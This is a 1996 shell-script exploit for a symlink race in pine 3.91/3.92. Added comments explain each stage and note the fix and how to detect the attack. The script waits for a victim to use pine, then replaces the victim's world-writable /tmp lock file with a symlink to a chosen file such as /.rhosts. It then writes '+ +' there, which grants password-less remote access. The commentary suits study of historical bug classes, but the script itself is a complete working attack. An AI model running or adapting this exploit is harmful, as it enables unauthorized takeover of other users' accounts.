#!/bin/sh
#
# pine bug exploit
#
# usage: pine.sh username path/file_to_create &
# ex:    pine.sh root /.rhosts &
# ex2:   pine.sh root /.rhosts > out & (and go to sleep).
#
# affected pine versions: 3.91, 3.92 .....
# pine version 3.95: fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
#                     e-torres@uniandes.edu.co
#

# Argument handling: when the script is started with no arguments at all,
# print the usage line and stop. Only the zero-argument case is tested;
# nothing here checks that a second argument was supplied.
argumentos=0
if [ $# -eq $argumentos ]
  then
    echo "Usage: $0 username path/file_to_create & "
    echo "ET Lownoise 1996 Colombia"
    exit
fi

# $1: account name to watch.
# $2: path that the symlink created later in /tmp will point at.
username=$1
archivo=$2

#CHANGE THIS:

#text='text to put in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command

# text is the single line written into the created file at the end of the
# script. In an rhosts file, '+ +' trusts every remote host and every remote
# user; combined with the /.rhosts target shown in the usage examples, that is
# the payoff of the whole script.
# Defender's view: an rhosts file containing '+' wildcards is a strong
# compromise indicator, and the payoff disappears where the r-services
# (rlogin/rsh) are disabled.
# usr is executed as a command (in backticks) further down; pineprog is
# compared word by word against the output of `w`.
text='+ +'
usr=users
pineprog=pine

#
# Stage 1: intended to wait until the watched account shows up in the output
# of the command named by $usr (`users` by default).
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0

# NOTE: both flags start at 0 and the `until` test uses -eq, so the test is
# already true on its first evaluation and the loop body below is never
# entered. The "is logged now" message is therefore printed without any login
# check having run. (The later loops over `w` output use -ne and do wait.)
until [ $entro -eq $entrada ]
do
        # Word-split the output of $usr and compare every word with $1.
        for nombre in `$usr`
        do
         if [ $nombre = $1 ]
            then
                entro=1

         fi
        done

done
date
echo "- Ok $username is logged now."
#
# Stage 2: wait until the watched account is seen running pine.
echo "- Lets wait that $1 run pine. "

noejecuto=0
ejecuto=0

# Runs until ejecuto differs from noejecuto, i.e. until a match sets it to 1.
# There is no sleep between iterations: `w` is forked back to back, so the
# script shows up as sustained CPU use and a continuous stream of short-lived
# `w` processes from a single account (visible wherever process accounting or
# equivalent monitoring is enabled).
until [ $ejecuto -ne $noejecuto ]
do

     # Every whitespace-separated word of the `w $username` output is compared
     # with $pineprog; any exact match counts as "pine is running".
     for ejecutando in `w $username`
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $1 ' is running ' $pineprog '.'
                ejecuto=1

       fi
     done

done

# Stage 3: work out the name of the lock file, then wait for it to go away.
#
# The /tmp listing is narrowed to lines that contain the account name and the
# mode string rw-rw-rw-; field 9 of what is left (the file name in the usual
# nine-column `ls -l` layout) is stored in lockfile. This is the weakness the
# script depends on: a lock file in a shared directory whose name any local
# user can read from a directory listing and whose mode is world-writable.
# temp1 and temporal are scratch files created in the current working
# directory and removed again immediately.
echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo "  quits $pineprog "
# Loop for as long as the lock file exists, which means the user has not quit
# pine yet.
cd /tmp

# `-s` is true while the file exists with a non-zero size, so the loop ends
# once the lock file has been removed (or is empty). `sleep 0` does not pause:
# this is a busy poll, so the gap between the file disappearing and the next
# step is as short as the scheduler allows.
while [ -s $lockfile ]
    do
    sleep 0
done

# Stage 4: the lock file name is free again, so a symbolic link with the same
# name is created in /tmp, pointing at $archivo.
#
# According to the script's own messages, the target file is created when the
# user next starts pine -- presumably because the affected versions open the
# lock path without exclusive-create semantics and follow the link; the header
# states that 3.95 is fixed.
# Defender's view: this bug class is closed by creating lock files with
# exclusive create (which fails on any existing path, including a symlink),
# with a mode that is not world-writable, or in a per-user directory instead
# of /tmp. For detection, look for symlinks in /tmp whose targets lie outside
# /tmp, especially dotfiles such as rhosts files.
cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
# $archivo is the complete path of the file to be created as $username
cd /tmp
ln -s $archivo $lockfile
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo "  $archivo "
echo "- Waiting $username to return pine "

# Stage 5: same polling pattern as the earlier wait for pine -- reset the
# flags, then scan the words of the `w` output until one equals $pineprog.
noejecuto=0
ejecuto=0

# Again a busy loop with no sleep; `w` is re-run continuously until a match.
until [ $ejecuto -ne $noejecuto ]
do
     for ejecutando in `w $username `
     do
       if [ $ejecutando = $pineprog ]
         then
                date
                echo '- OK ' $username ' is running ' $pineprog
                ejecuto=1

       fi
     done

done
# Stage 6: write $text to the lock file name. That name is the symlink created
# earlier, and the redirection follows it, so the content lands in $archivo.
# The write can only succeed if the file at the target is writable by the
# account running this script, which matches the rw-rw-rw- mode filtered for
# when the lock file was located.
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
# rm removes the symlink itself, not the file it points at. What remains on
# the system is the target file; it was presumably created by the victim's
# pine process, so its ownership will not identify the account that ran this
# script -- timestamps and process/login records are the better forensic lead.
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"

